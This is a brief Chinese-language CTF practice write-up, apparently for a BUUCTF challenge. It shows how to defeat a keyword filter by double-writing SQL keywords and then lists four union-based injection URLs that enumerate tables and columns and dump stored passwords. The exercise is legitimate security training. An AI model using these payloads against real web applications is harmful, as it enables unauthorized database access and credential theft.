练习阶段，所以当自己试了union等自己所知道的注入方法没做出来后，就直接看了wp

其过滤了过滤 select or and union from password等关键词

所以用双写绕过（思考：是只能用双写绕过吗？不能用大小写、双写关键词、编码等绕过？）
剩下的就是常规的联合注入了：
所用代码如下：

http://c2647597-2468-4ccb-94e0-3ffd5876387d.node4.buuoj.cn:81/check.php?username=admin&password=admin' ununionion sselectelect 1,2,3 %23

http://c2647597-2468-4ccb-94e0-3ffd5876387d.node4.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

http://c2647597-2468-4ccb-94e0-3ffd5876387d.node4.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

http://c2647597-2468-4ccb-94e0-3ffd5876387d.node4.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

总结：了解了一种新的绕过方法